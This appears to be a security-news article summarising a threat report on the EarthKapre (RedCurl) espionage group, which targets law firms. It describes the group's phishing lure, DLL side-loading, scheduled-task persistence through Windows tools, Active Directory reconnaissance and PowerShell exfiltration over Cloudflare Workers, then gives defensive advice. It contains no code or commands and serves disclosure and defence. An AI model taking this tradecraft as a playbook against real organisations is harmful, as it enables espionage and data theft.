EarthKapre, known as RedCurl in the cybersecurity world, has recently caught the attention of experts for its sophisticated cyber espionage activities targeting private-sector organizations, specifically law firms and legal services. The discovery of this group by eSentire Threat Response Unit (TRU) in January 2025 has shed light on a complex multi-stage attack strategy tailored for corporate espionage.
The modus operandi of EarthKapre involves luring victims through a meticulously crafted phishing email disguised as a job application from the popular platform Indeed. The email contains a PDF attachment that entices recipients to download a ZIP archive. Within this archive lies a mountable ISO file, which upon opening reveals a seemingly legitimate Adobe executable that serves as the entry point for the next phase of the attack.
What sets EarthKapre apart is its use of DLL side-loading, a technique that enables the malware to evade traditional security protocols. Once activated, the malware executes a string decryption function to extract crucial information, such as the command-and-control server URL and AES keys for encrypted communications. To establish persistence on compromised systems, EarthKapre creates a scheduled task that leverages common Windows tools like pcalua.exe and rundll32.exe, thus ensuring continued control while flying under the radar of conventional security measures.
With persistence secured, the malware proceeds to gather valuable intelligence during the reconnaissance phase. This includes harvesting user credentials, system configurations, disk details, and information on installed antivirus software. The use of SysInternals AD Explorer facilitates data retrieval from Active Directory, which is then archived with password protection before being exfiltrated to a cloud storage service. The data exfiltration process involves PowerShell PUT requests, with EarthKapre incorporating Cloudflare Workers in its command-and-control (C2) infrastructure to maintain stealth. However, eSentire researchers have identified a weakness in Cloudflare’s free tier that can potentially disrupt the group’s operations.
In response to the EarthKapre threat, cybersecurity experts emphasize the importance of educating employees on the perils of phishing emails, particularly those masquerading as job opportunities, and verifying the authenticity of email attachments. Organizations are urged to deploy robust endpoint detection and response (EDR) systems capable of identifying advanced threats and fortifying their defenses. eSentire has also shared indicators of compromise (IOCs) like file hashes and C2 domains to aid in tracking the group’s movements and fortifying against future incursions. These IOCs serve as valuable tools for network monitoring, especially for high-risk sectors such as law firms that are prime targets for this espionage outfit.